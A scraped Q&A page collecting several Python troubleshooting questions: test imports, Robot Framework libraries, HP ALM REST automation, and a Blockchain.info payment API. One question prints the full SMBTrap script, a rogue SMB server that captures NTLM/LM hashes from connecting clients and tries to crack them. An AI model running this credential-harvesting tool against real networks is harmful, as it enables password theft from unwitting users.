Import doesn't work? - Python

I'm writing some unit tests with Python and everything was going fine until I hit a very strange problem, which I think is import-related. Here is the problem:
I'm trying to create a GlanceApi object in my test, just like in other tests I've written, but I get this error:
======================================================================
ERROR: setUpClass (__main__.TestGlance)
----------------------------------------------------------------------
Traceback (most recent call last):
File "glance_tests.py", line 22, in setUpClass
self.glnce = glance.GlanceApi("")
AttributeError: 'module' object has no attribute 'GlanceApi'
and this is my code:
import unittest
import json
import time
import sys
sys.path.append("../src")
import glance
import novaapiclient


class TestGlance(unittest.TestCase):

    @classmethod
    def setUpClass(self):
        confFile = file('config.txt', 'r+w')
        configs = ""
        for line in confFile:
            if not (line.startswith('#')) and len(line) != 0:
                configs = line.split(';')
        novaAPI = novaapiclient.NovaApiClient(str(configs[0]))
        novaAPI.make_auth(configs[1], configs[2], configs[3])
        self.glnce = glance.GlanceApi()  # << HERE ERROR
        self.glnce.set_auth_obj(novaAPI.get_auth_obj())
It looks just like other tests I've written, but it doesn't work in this case.
Thanks in advance.
This is the glance source:
import pycurl
import cStringIO
import os


class GlanceApi:

    def __init__(self):
        self.auth = ""
        self.http_handler = ""

    def set_auth_obj(self, authenticate):
        self.auth = authenticate

    def list_images(self, is_public=False, with_details=False):
        if self.auth.is_authed() == False:
            return False
        self.http_handler = pycurl.Curl()
        printer = cStringIO.StringIO()
        if with_details == False:
            url_complement = "/images"
        else:
            url_complement = "/images/detail"
        if is_public == False:
            full_url = str(self.auth.get_image_URL() + url_complement)
        else:
            full_url = str(self.auth.get_image_URL()[:30] + url_complement)
        headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token())]
        self.http_handler.setopt(pycurl.URL, full_url)
        self.http_handler.setopt(pycurl.HTTPGET, 1)
        self.http_handler.setopt(pycurl.HTTPHEADER, headers)
        self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
        self.http_handler.perform()
        http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
        self.http_handler.close()
        return printer.getvalue()

    def get_image_metadata(self, id, is_public=False):
        if self.auth.is_authed() == False:
            return False
        self.http_handler = pycurl.Curl()
        printer = cStringIO.StringIO()
        url_complement = "/images/%s" % id
        # Setting the request url according the is_public parameter.
        if is_public == False:
            full_url = str(self.auth.get_image_URL() + url_complement)
        else:
            full_url = str(self.auth.get_image_URL()[:30] + url_complement)
        headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token())]
        self.http_handler.setopt(pycurl.URL, full_url)
        self.http_handler.setopt(pycurl.CUSTOMREQUEST, 'HEAD')
        self.http_handler.setopt(pycurl.HTTPHEADER, headers)
        self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
        self.http_handler.perform()
        http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
        self.http_handler.close()
        return printer.getvalue()

    def add_image(self, file_path, name, is_public=False):
        # Verifying if the user is authenticated.
        if self.auth.is_authed() == False:
            return False
        self.http_handler = pycurl.Curl()
        printer = cStringIO.StringIO()
        url_complement = "/images"
        if is_public == False:
            full_url = str(self.auth.get_image_URL() + url_complement)
        else:
            full_url = str(self.auth.get_image_URL()[:30] + url_complement)
        size = os.path.getsize(file_path)
        image = [(str(name), (pycurl.FORM_FILE, str(file_path)))]
        headers = ["X-Auth-Token:%s" % str(self.auth.get_auth_token()), "x-image-meta-name:%s" % name, "x-image-meta-size:%s" % str(size)]
        if is_public == True:
            headers.append("x-image-meta-is-public:true")
        self.http_handler.setopt(pycurl.URL, full_url)
        self.http_handler.setopt(self.http_handler.HTTPPOST, image)
        self.http_handler.setopt(pycurl.HTTPHEADER, headers)
        self.http_handler.setopt(pycurl.WRITEFUNCTION, printer.write)
        self.http_handler.perform()
        http_code = int(self.http_handler.getinfo(pycurl.HTTP_CODE))
        self.http_handler.close()
        return printer.getvalue()
this is the directory structure:
Project
+ src/
    - glance.py
    - ...
+ Tests/
    - glance_tests.py
    - ...
EDIT
RESOLVED. How? I have no idea, but here is what I did: I created a new file named glanceapi.py, copied the contents of glance.py into it, changed the name in the import, and it works. I have no idea what the problem was; it could be some Python bug. I want to say thanks to the people who tried to help me.
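For reference, a quick way to check which module Python was actually binding to the name glance (a diagnostic sketch, not something from the original test run):

# Diagnostic sketch: see which file Python loaded for "glance" and whether
# GlanceApi is visible on it.
import sys
sys.path.append("../src")
import glance

print(glance.__file__)               # which glance.py (or glance package) was loaded?
print(hasattr(glance, "GlanceApi"))  # False would reproduce the AttributeError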

Go to IDLE, and see what the PYTHONPATH is.
import sys
sys.path
If the directory where glance.py is located is not on that path, I suppose you would have to insert/append it using sys.path.append(). See here for how to work with sys.path: http://effbot.org/librarybook/sys.htm
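As a concrete sketch of that suggestion (the ../src layout is taken from the question; nothing else is assumed), the test file could build the path relative to itself instead of relying on the current working directory:

# Sketch: add Project/src to sys.path relative to the test file itself,
# so the import works no matter where the tests are started from.
import os
import sys

SRC_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "src"))
if SRC_DIR not in sys.path:
    sys.path.insert(0, SRC_DIR)

import glance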
EDIT: Let me know if this does not work.

Related

Getting Import/Library issue in my Robot Framework

I'm getting Import/Library issues in my Robot Framework project. I have a CustomLib file where all my custom functions reside; while trying to import the CustomLib I get an error:
Error screenshots: https://i.stack.imgur.com/poPzQ.png and https://i.stack.imgur.com/qkbxK.png
Robot is complaining: Setup failed: No keyword with name 'CustomLib.get config test data'.
CustomLib code:
import os
# Declaring empty list for test data and config file
testData = {}
configTestData = {}
class CustomLib:
ROBOT_LIBRARY_SCOPE = 'Test Case'
# Function for getting data from config file and test data file altogether
@staticmethod
def get_global_config_data_and_test_data(testdata_filename):
configpath = os.path.dirname(os.path.abspath(__file__))
print(configpath)
configpath1 = configpath.replace("Utils", "")
configpath = configpath1.replace(configpath1, "config.properties")
# configpath=configpath.replace("Utils", "config.properties")
try:
file = open(configpath)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
testData[a] = b
except Exception as e:
if hasattr(e, 'message'):
print(e.message)
else:
print(e)
finally:
file.close()
return CustomLib.get_testData_From_PropertiesFile(CustomLib.OS_path_fromat_separator(testdata_filename))
# Function for reading test data from property file
@staticmethod
def get_testData_From_PropertiesFile(propfile):
try:
file = open(propfile)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
testData[a] = b
except Exception as e:
if hasattr(e, 'message'):
print(e.message)
else:
print(e)
finally:
file.close()
return testData
# Function for generating dynamic XPath which has text in it
def generate_dynamic_xpath(self, locatorvalue, replacement):
after_replacement = locatorvalue.replace('#', replacement)
return after_replacement
# Function for creating report name
def create_report_name(self, testContent, date):
reportname = testContent.replace('date', date)
return reportname
# Function for reading config.properties file
@staticmethod
def get_config_testdata():
configpath = os.path.dirname(os.path.abspath(__file__))
print(configpath)
configpath1 = configpath.replace("Utils", "")
configpath = configpath1.replace(configpath1, "config.properties")
# configpath=configpath.replace("Utils", "config.properties")
print(configpath)
try:
file = open(configpath)
for line in file:
content = line.split("=")
firstArgument = content[0]
secondArgument = content[1]
a = firstArgument.rstrip('\n')
b = secondArgument.rstrip('\n')
configTestData[a] = b
except Exception as e:
if hasattr(e, 'message'):  # exception occurred while reading properties file
print(e.message)
else:
print(e)
finally:
file.close()
return configTestData
# Function to format the path for different OS
@staticmethod
def OS_path_fromat_separator(pathformat):
config_data = {}
config_data = CustomLib.get_config_testdata()
if (config_data['OS'] == 'Windows'):
OSPath = pathformat.replace('$', '//')
return OSPath
else:
OSPath = pathformat.replace('$', '/')
return OSPath
# Function for generating dynamic CSS on the basis of text
def generate_dynamic_CSS(self, locatorvalue, replacement):
after_replacement = locatorvalue.replace('#', replacement)
return after_replacement
def main():
CustomLib.get_global_config_data()
# CustomLib.get_testData_From_PropertiesFile()
if __name__ == '__main__':
main()
I'm using a relative path to import the custom library. Below is a reference for how to import using a relative path, so this should work:
Library ..${/}foldername${/}customlibrary.py
You can also use the full path to import the library.
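A quick way to sanity-check that relative path from Python before pointing Robot at it (directory and file names below are placeholders for the real ones); note that when a library is imported by path, its keyword prefix is the file name without the extension:

# Sketch: confirm the path the Library setting would resolve to actually exists.
import os

SUITE_DIR = "/path/to/robot/suites"  # directory that contains the .robot file (placeholder)
LIB_PATH = os.path.normpath(os.path.join(SUITE_DIR, "..", "foldername", "customlibrary.py"))

print(LIB_PATH)
print(os.path.isfile(LIB_PATH))  # should be True if the relative Library import can work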

HP ALM results attachment and status update using python

Challenge: attach screenshots to tests in the Test Lab and update the status as PASS/FAIL step-wise (currently, updating the pass status is enough).
I am expected to write a script in Python to attach test results to the test cases present in the Test Lab, then for each test step set the Expected result to "As Expected" and pass the TC step by step.
That is, when performing this manually, we select the case, click Run, enter "As expected" in the expected output area, pass that step, and do this for all test steps of the test case. This needs to be automated. I have a folder of screenshots (named similarly to the TC names), so the script should upload the screenshots and update the status.
What I have tried so far:
I was able to connect to ALM and, with a partial test case name, pull the full test case name from the Test Plan, but unfortunately I am still struggling to achieve the final goal.
My code so far :
import win32com
from win32com.client import Dispatch
import codecs
import re
import json

# Login Credentials
qcServer = "https://almurl.saas.microfocus.com/qcbin/"
qcUser = "my_username"
qcPassword = "pwd"
qcDomain = "domain"
testList = []
testdict = {}
project = "Crew_Management"

# Do the actual login
td = win32com.client.Dispatch("TDApiOle80.TDConnection.1")
td.InitConnectionEx(qcServer)
td.Login(qcUser,qcPassword)
td.Connect(qcDomain,project)
if td.Connected == True:
    print ("System: Logged in to " +project)
else:
    print ("Connect failed to " +project)

mg = td.TreeManager # Tree manager
name = ['TC001','TC002','TC003','TC003','TC004','TC005','TC006','TC007','TC008','TC009','TC010','TC011','TC012','TC013','TC014']
folder = mg.NodeByPath('Subject\\Test Factory\\MPG\\MPG Regression Test_Yearly Request\\GUI')
for x in name:
    testList = folder.FindTests(x)
    #print(type(testList))
    print(testList[0].Name)
    print(testList[0].DesStepsNum)

td.Disconnect()
td.Logout()
Any help or guidance is much appreciated !
Assuming that you have working experience in Python, here are all the different functions needed to complete your task.
Reference: https://admhelp.microfocus.com/alm/api_refs/REST_TECH_PREVIEW/ALM_REST_API_TP.html
Global Variable
import re
import json
import datetime
import time
import sys
import os, fnmatch
from os import listdir
from os.path import isfile, join
from xml.etree.ElementTree import Element, SubElement, tostring, parse
import glob
from requests.auth import HTTPBasicAuth
import requests
ALM_USER_NAME = ""
ALM_PASSWORD = ""
ALM_DOMAIN = ""
ALM_URL = ""
AUTH_END_POINT = ALM_URL + "authentication-point/authenticate"
QC_SESSION_END_POINT = ALM_URL + "rest/site-session"
QC_LOGOUT_END_POINT = ALM_URL + "authentication-point/logout"
ALM_MIDPOINT = "rest/domains/" + ALM_DOMAIN + "/projects/"
PATH_SEP = os.path.sep
Login Function
def alm_login(self):
"""
Function : alm_login
Description : Authenticate user
Parameters : global parameter
alm_username - ALM User
alm_password - ALM Password
"""
response = self.alm_session.post(AUTH_END_POINT,
auth=HTTPBasicAuth(ALM_USER_NAME, ALM_PASSWORD))
if response.status_code == 200:
response = self.alm_session.post(QC_SESSION_END_POINT)
if response.status_code == 200 or response.status_code == 201:
print "ALM Authentication successful"
else:
print "Error: ", response.status_code
else:
print "Error: ", response.status_code
self.alm_session.headers.update({'Accept':'application/json',
'Content-Type': 'application/xml'})
return
Logout Function
After the logout method is successful the cookie should expire
def alm_logout(self):
'''
Function : alm_logout
Description : terminate user session
Parameters : No Parameters
'''
response = self.alm_session.post(QC_LOGOUT_END_POINT)
print "Logout successful", response.headers.get('Expires'), response.status_code
return
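These functions are written as methods (they use self.alm_session, self.test_set_path and self.parser_temp_dic), so something has to create that state. A hedged sketch of a wrapper class they could live in; the class name and constructor are illustrative, and helpers such as create_key_value, get_field_value and generate_xml_data referenced later are not shown here:

import requests

class AlmClient(object):
    def __init__(self, test_set_path):
        self.alm_session = requests.Session()  # one shared session keeps the ALM auth cookies
        self.test_set_path = test_set_path
        self.parser_temp_dic = {}

    # paste alm_login, alm_logout, find_test_set_folder, find_folder_id,
    # create_run_instance, update_run_instance, upload_result_file and
    # bulk_operation in here as methods

# Illustrative usage:
# client = AlmClient("Root\\MyFolder\\MyTestSet")
# client.alm_login()
# ...create runs, update statuses, upload attachments...
# client.alm_logout()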
Get Test Set Folder
If the test cases span across multiple test suites then it is better to get the test set folder first and find the necessary test suite.
def find_test_set_folder(self):
'''
Function : find_test_set_folder
Description : This sends a couple of http request and authenticate the user
Parameters : 1 Parameter
test_set_path - ALM test set path
'''
json_str = json.loads(self.find_folder_id(self.test_set_path.split("\\"), "test-set-folders"
, 0, "id"))
if 'entities' in json_str:
return create_key_value(json_str['entities'][0]['Fields'])['id']
else:
return create_key_value(json_str['Fields'])['id']
Get Folder Id
This method will help you find the Test Suite Folder ID or Test Plan Folder Id.
def find_folder_id(self, arrfolder, str_api, parent_id, fields):
'''
Function : find_folder_id
Description : This sends a couple of http request and authenticate the user
Parameters : 1 Parameter
test_set_path - ALM test set path
'''
for foldername in arrfolder:
payload = {"query": "{name['" + foldername + "'];parent-id[" + str(parent_id) + "]}",
"fields": fields}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/" + str_api, params=payload)
obj = json.loads(response.text)
if obj["TotalResults"] >= 1:
parent_id = get_field_value(obj['entities'][0]['Fields'], "id")
# print("folder id of " + foldername + " is " + str(parent_id))
else:
# print("Folder " + foldername + " does not exists")
inputdata = dict()
inputdata['Type'] = str_api[0:len(str_api) - 1]
inputdata['name'] = foldername
inputdata['parent-id'] = str(parent_id)
data = generate_xml_data(inputdata)
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data)
obj = json.loads(response.text)
if response.status_code == 200 or response.status_code == 201:
parent_id = get_field_value(obj['Fields'], "id")
# print("folder id of " + foldername + " is " + str(parent_id))
return response.text
Create Run Instance
Before updating the testing status, we must create a run instance for the test.
def create_run_instance(self, test_set_id, test_map):
'''
Function : create_run_instance
Description : Create new run instances
Parameters : Test Set Id
'''
str_api = "test-instances"
fields = "id,test-id,test-config-id,cycle-id"
payload = {"query": "{cycle-id['" + test_set_id + "']}", "fields": fields,
"page-size": 5000}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/" + str_api, params=payload)
obj = json.loads(response.text)
run_instance_post = "<Entities>"
for entity in obj["entities"]:
run_name = re.sub('[-:]', '_',
'automation_' + datetime.datetime.fromtimestamp(time.time()).strftime(
'%Y-%m-%d %H:%M:%S'))
temp_map = create_key_value(entity["Fields"])
_test_id = int(temp_map['test-id'])
self.parser_temp_dic[_test_id]['testcycl-id'] = temp_map['id']
self.parser_temp_dic[_test_id]['test-config-id'] = temp_map['test-config-id']
self.parser_temp_dic[_test_id]['test-id'] = temp_map['test-id']
self.parser_temp_dic[_test_id]['cycle-id'] = temp_map['cycle-id']
# parser_temp_dic[int(temp_map['test-id'])]['status'].sort()
status = "Passed"
if 'Failed' in self.parser_temp_dic[int(temp_map['test-id'])]['status']:
status = 'Failed'
self.parser_temp_dic[int(temp_map['test-id'])]['final-status'] = status
inputdata = dict()
inputdata['Type'] = 'run'
inputdata['name'] = run_name
inputdata['owner'] = ALM_USER_NAME
inputdata['test-instance'] = str(1)
inputdata['testcycl-id'] = str(temp_map['id'])
inputdata['cycle-id'] = str(temp_map['cycle-id'])
inputdata['status'] = 'Not Completed'
inputdata['test-id'] = temp_map['test-id']
inputdata['subtype-id'] = 'hp.qc.run.MANUAL'
data = generate_xml_data(inputdata)
run_instance_post = run_instance_post + data
self.bulk_operation("runs", run_instance_post + "</Entities>", True, "POST")
return
Update Run Instance
def update_run_instance(self, test_set_id):
'''
Function : update_run_instance
Description : Update the test status in run instances
Parameters : No input parameter
'''
fields = "id,test-id"
payload = {"query": "{cycle-id['" + test_set_id + "']}", "fields": fields,
"page-size": 5000}
response = self.alm_session.get(ALM_URL + ALM_MIDPOINT + "/runs", params=payload)
obj = json.loads(response.text)
run_instance_put = "<Entities>"
for entity in obj["entities"]:
if len(entity["Fields"]) != 1:
temp_map = create_key_value(entity["Fields"])
self.parser_temp_dic[int(temp_map['test-id'])]['run-id'] = temp_map['id']
inputdata = dict()
inputdata['Type'] = 'run'
inputdata['id'] = str(temp_map['id'])
intermediate_ = self.parser_temp_dic[int(temp_map['test-id'])]['testcycl-id']
inputdata['testcycl-id'] = str(intermediate_)
inputdata['status'] = self.parser_temp_dic[int(temp_map['test-id'])]['final-status']
data = generate_xml_data(inputdata)
run_instance_put = run_instance_put + data
self.bulk_operation("runs", run_instance_put + "</Entities>", True, "PUT")
return
Upload Result File
Uploading file to any object in ALM
def upload_result_file(self, test_set_id, report_file):
'''
Function : upload_result_file
Description : Upload test result to ALM
'''
payload = open(report_file, 'rb')
headers = {}
headers['Content-Type'] = "application/octet-stream"
headers['slug'] = "test-results" + report_file[report_file.rfind("."):]  # keep the dot so the slug ends in e.g. ".png"
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/test-sets/" +
str(test_set_id) + "/attachments/",
headers=headers, data=payload)
if not (response.status_code == 200 or response.status_code == 201):
print "Attachment step failed!", response.text, response.url, response.status_code
return
Bulk Operation
This is a helper that allows us to POST an array of data.
def bulk_operation(self, str_api, data, isbulk, request_type):
'''
Function : Post Test Case / Test Instance
Description : Generic function to post multiple entities.
Parameters : 3 parameters
str_api - End point name
data - Actual data to post
isbulk - True or False
'''
response = None
headers = {}
try:
if isbulk:
headers['Content-Type'] = "application/xml;type = collection"
if request_type == 'POST':
response = self.alm_session.post(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data,
headers=headers)
elif request_type == 'PUT':
response = self.alm_session.put(ALM_URL + ALM_MIDPOINT + "/" + str_api, data=data,
headers=headers)
except Exception as err:
print err
if response.status_code == 200 or response.status_code == 201:
return response.text
return response
You can refer to this code:
https://github.com/arunprabusamy/Python-Libraries/blob/main/alm_RestAPI/almLib.py
You need to send only three values: Test Set ID (Cycle ID), ALM Test ID and Execution Status. The library automatically builds the JSON payload, creates a test run, and updates the result.

I cannot run a Python script

I'm new and I'm using a translator, sorry if this is hard to understand.
I'm trying to run a Python script on Kali Linux and it throws several errors. I don't understand Python, and I searched Google without finding a solution.
root@Alien:~/SMBTrap/smbtrap# python smbtrap2.py
Traceback (most recent call last):
File "smbtrap2.py", line 6, in <module>
from quickcrack import try_to_crack_hash
File "/root/SMBTrap/smbtrap/quickcrack.py", line 4, in <module>
from bitarray import bitarray
ImportError: No module named bitarray
root@Alien:~/SMBTrap/smbtrap#
Below is the code of the script I'm trying to run:
from impacket import smbserver, smb
import ntpath
from threading import RLock
import json
from quickcrack import try_to_crack_hash
"""
This script acts as an SMB server and gathers credentials from connecting users.
Developed by Brian Wallace @botnet_hutner
"""
sessions = {}
output_file_lock = RLock()
def report_authentication_attempt(connId, auth_details):
global output_file_lock
sessions[connId] = {"authentication": auth_details, "shares": []}
with output_file_lock:
with open("credentials.txt", "a") as f:
f.write(json.dumps(auth_details) + "\n")
if "UnicodePwd" in auth_details and auth_details['UnicodePwd'] != "":
print "{0}: {1}".format(auth_details['client_ip'], auth_details['UnicodePwd'])
password = try_to_crack_hash(auth_details['UnicodePwd'])
if password is not None:
print "{0}: {1}::{2} has password '{3}'".format(auth_details['client_ip'], auth_details["PrimaryDomain"], auth_details['Account'], password)
if "AnsiPwd" in auth_details and auth_details['AnsiPwd'] != "":
print "{0}: {1}".format(auth_details['client_ip'], auth_details['AnsiPwd'])
password = try_to_crack_hash(auth_details['AnsiPwd'])
if password is not None:
print "{0}: {1}::{2} has password '{3}'".format(auth_details['client_ip'], auth_details["PrimaryDomain"], auth_details['Account'], password)
def report_tree_connect_attempt(connId, connect_details):
session = sessions[connId]
if "client_ip" in session:
print "{2}: {0} accessed {1}".format(session['client_ip'], connect_details['Path'], connId)
session['shares'].append(connect_details)
sessions[connId] = session
def smbCommandHook_SMB_COM_SESSION_SETUP_ANDX(connId, smbServer, SMBCommand, recvPacket):
# Accept any authentication except for empty authentication
supplied_creds = False
# The following is impacket code modified to extract credentials
connData = smbServer.getConnectionData(connId, checkStatus=False)
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
# Process Standard Security
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data(flags=recvPacket['Flags2'])
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
# Let's get those credentials
to_extract_from_session_setup_data = [
"Account",
"AnsiPwd",
"NativeLanMan",
"UnicodePwd",
"NativeOS",
"PrimaryDomain",
]
extracted_data = {}
for key in (i for i in to_extract_from_session_setup_data if i in sessionSetupData.__dict__['fields']):
extracted_data[key] = sessionSetupData[key]
if 'AnsiPwd' in extracted_data:
if len([i for i in extracted_data['AnsiPwd'] if i != "\x00"]) == 0:
# It's null, we should just remove it
extracted_data['AnsiPwd'] = ""
elif len(extracted_data['AnsiPwd']) == 24:
if 'UnicodePwd' in extracted_data and extracted_data['AnsiPwd'] == extracted_data['UnicodePwd']:
# Hash has been duplicated across fields, likely NTLM, not LM
extracted_data['AnsiPwd'] = ""
else:
extracted_data['AnsiPwd'] = extracted_data['AnsiPwd'].encode("hex") # long live Python 2.7
extracted_data['AnsiPwd'] = "{1}:$NETLM$1122334455667788${0}".format(extracted_data['AnsiPwd'], extracted_data['Account'] if 'Account' in extracted_data else "")
supplied_creds = True
else:
# its plaintext? lol
supplied_creds = True
pass
if 'UnicodePwd' in extracted_data:
if len(extracted_data['UnicodePwd']) >= 56:
# NTLMv2
hmac = extracted_data['UnicodePwd'][0:16].encode("hex")
rest = extracted_data['UnicodePwd'][16:].encode("hex")
extracted_data['UnicodePwd'] = "{0}::{1}:1122334455667788:{2}:{3}".format(extracted_data['Account'] if 'Account' in extracted_data else "", extracted_data['PrimaryDomain'] if 'PrimaryDomain' in extracted_data else "", hmac, rest)
supplied_creds = True
elif len(extracted_data['UnicodePwd']) == 24:
# NTLMv1?
extracted_data['UnicodePwd'] = extracted_data['UnicodePwd'].encode("hex")
extracted_data['UnicodePwd'] = "{1}:$NETNTLM$1122334455667788${0}".format(extracted_data['UnicodePwd'], extracted_data['Account'] if 'Account' in extracted_data else "")
supplied_creds = True
conn_data = smbServer.getConnectionData(connId, False)
extracted_data['client_ip'] = conn_data['ClientIP']
report_authentication_attempt(connId, extracted_data)
errorCode = smbserver.STATUS_SUCCESS if supplied_creds else smbserver.STATUS_LOGON_FAILURE
connData['Uid'] = 10
respParameters['Action'] = 0
smbServer.log('User %s\\%s authenticated successfully (basic)' % (sessionSetupData['PrimaryDomain'], sessionSetupData['Account']))
respData['NativeOS'] = smbserver.encodeSMBString(recvPacket['Flags2'], smbServer.getServerOS())
respData['NativeLanMan'] = smbserver.encodeSMBString(recvPacket['Flags2'], smbServer.getServerOS())
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
connData['Authenticated'] = supplied_creds
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smbCommandHook_SMB_COM_NEGOTIATE(connId, smbServer, SMBCommand, recvPacket):
if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY:
recvPacket['Flags2'] -= smb.SMB.FLAGS2_EXTENDED_SECURITY
return smbserver.SMBCommands.smbComNegotiate(smbserver.SMBCommands(), connId, smbServer, SMBCommand, recvPacket)
def smbCommandHook_SMB_COM_TREE_CONNECT_ANDX(connId, smbServer, SMBCommand, recvPacket):
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
treeConnectAndXData = smb.SMBTreeConnectAndX_Data(flags=recvPacket['Flags2'])
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
path = smbserver.decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
local_path = ntpath.basename(path)
service = smbserver.decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Service'])
report_tree_connect_attempt(connId, {"Path": path, "local_path": local_path, "Service": service})
return smbserver.SMBCommands.smbComTreeConnectAndX(smbserver.SMBCommands(), connId, smbServer, SMBCommand, recvPacket)
# Overriding this allows us to claim we have no shares, so we still get ANDX data, but don't need to share anything
def override_searchShare(connId, share, smbServer):
return None
smbserver.searchShare = override_searchShare
if __name__ == "__main__":
smbConfig = smbserver.ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global', 'server_name', 'server_name')
smbConfig.set('global', 'server_os', 'UNIX')
smbConfig.set('global', 'server_domain', 'WORKGROUP')
smbConfig.set('global', 'log_file', 'smb.log')
smbConfig.set('global', 'credentials_file', '')
smbConfig.add_section('IPC$')
smbConfig.set('IPC$', 'comment', '')
smbConfig.set('IPC$', 'read only', 'yes')
smbConfig.set('IPC$', 'share type', '3')
smbConfig.set('IPC$', 'path', '')
server = smbserver.SMBSERVER(('0.0.0.0', 445), config_parser=smbConfig)
server.processConfigFile()
server.registerNamedPipe('srvsvc', ('0.0.0.0', 4344))
# Auth and information gathering hooks
# Hook session setup to grab the credentials and deny any empty authentication requests
server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, smbCommandHook_SMB_COM_SESSION_SETUP_ANDX)
# Hook the negotiate call to disable SPNEGO
server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, smbCommandHook_SMB_COM_NEGOTIATE)
# Hook tree connect
server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, smbCommandHook_SMB_COM_TREE_CONNECT_ANDX)
server.serve_forever()
It looks like the quickcrack module depends on the external bitarray module. Have you tried installing it, e.g. pip install bitarray?
If you are using SMBTrap the dependencies are listed here.
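If pip installs it but the import still fails, it may have been installed for a different interpreter than the one running the script. A small check (not from the original answer):

# Print which interpreter and search path this script actually uses, so the
# module can be installed for that same interpreter, e.g.:
#     /usr/bin/python -m pip install bitarray
import sys

print(sys.executable)  # the Python binary running smbtrap2.py
print(sys.path)        # where this interpreter looks for bitarray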

Invalid JSON object when posting to an API - Python

I am using Blockchain.info's API to send multiple payments. I believe I have everything as it should be, but when I run the code I get the following error: RuntimeError: ERROR: Invalid Recipients JSON. Please make sure it is url encoded and consult the docs. The docs can be found here: https://blockchain.info/api/blockchain_wallet_api
The Python library I am using can be found here: https://github.com/p4u/blockchain.py/blob/master/blockchain.py
The only other post on this issue is by the original creator of the library; he said the problem was that the amounts cannot be decimals, but mine are not. The post can be found here: https://bitcointalk.org/index.php?topic=600870.0
Here is my code:
from __future__ import print_function
from itertools import islice, imap
import csv, requests, json, math
from collections import defaultdict
import requests
import urllib
import json
from os.path import expanduser
import configparser
class Wallet:
guid = 'g'
isAccount = 0
isKey = 0
password1 = 'x'
password2 = 'y'
url = ''
def __init__(self, guid = 'g', password1 = 'x', password2 = 'y'):
if guid.count('-') > 0:
self.isAccount = 1
if password1 == '': # wallet guid's contain -
raise ValueError('No password with guid.')
else:
self.isKey = 1
self.guid = guid
self.url = 'https://blockchain.info/merchant/' + guid + '/'
self.password1 = password1
self.password2 = password2
r = requests.get('http://api.blockcypher.com/v1/btc/main/addrs/A/balance')
balance = r.json()['balance']
with open("Entries#x1.csv") as f,open("winningnumbers.csv") as nums:
nums = set(imap(str.rstrip, nums))
r = csv.reader(f)
results = defaultdict(list)
for row in r:
results[sum(n in nums for n in islice(row, 1, None))].append(row[0])
self.number_matched_0 = results[0]
self.number_matched_1 = results[1]
self.number_matched_2 = results[2]
self.number_matched_3 = results[3]
self.number_matched_4 = results[4]
self.number_matched_5 = results[5]
self.number_matched_5_json = json.dumps(self.number_matched_5, sort_keys = True, indent = 4)
print(self.number_matched_5_json)
if len(self.number_matched_3) == 0:
print('Nobody matched 3 numbers')
else:
self.tx_amount_3 = int((balance*0.001)/ len(self.number_matched_3))
if len(self.number_matched_4) == 0:
print('Nobody matched 4 numbers')
else:
self.tx_amount_4 = int((balance*0.1)/ len(self.number_matched_4))
if len(self.number_matched_5) == 0:
print('Nobody matched 3 numbers')
else:
self.tx_amount_5 = int((balance*0.4)/ len(self.number_matched_5))
self.d = {el: self.tx_amount_5 for el in json.loads(self.number_matched_5_json)}
print(self.d)
self.d_url_enc = urllib.urlencode(self.d)
def Call(self, method, data = {}):
if self.password1 != '':
data['password'] = self.password1
if self.password2 != '':
data['second_password'] = self.password2
response = requests.post(self.url + method,params=data)
json = response.json()
if 'error' in json:
raise RuntimeError('ERROR: ' + json['error'])
return json
def SendPayment(self, toaddr, amount, fromaddr = 'A', shared = 0, fee = 0.0001, note = True):
data = {}
data['to'] = toaddr
data['amount'] = self.tx_amount_5
data['fee'] = fee
data['recipients'] = self.d_url_enc
if fromaddr:
data['from'] = fromaddr
if shared:
data['shared'] = 'true'
if note:
data['note'] = 'n'
response = self.Call('payment',data)
def SendManyPayment(self, fromaddr = True, shared = False, fee = 0.0001, note = True):
data = {}
recipients = self.d_url_enc
data['recipients'] = recipients.__str__().replace("'",'"')
data['fee'] = str(fee)
if fromaddr:
data['from'] = 'A'
if shared:
data['shared'] = 'true'
else:
data['shared'] = 'false'
if note:
data['note'] = 'n'
response = self.Call('sendmany',data)
return response
print(Wallet().SendManyPayment())
Complete runtime error:
Traceback (most recent call last):
File "D:\Documents\B\Code\A\jsontest.py", line 125, in <module>
print(Wallet().SendManyPayment())
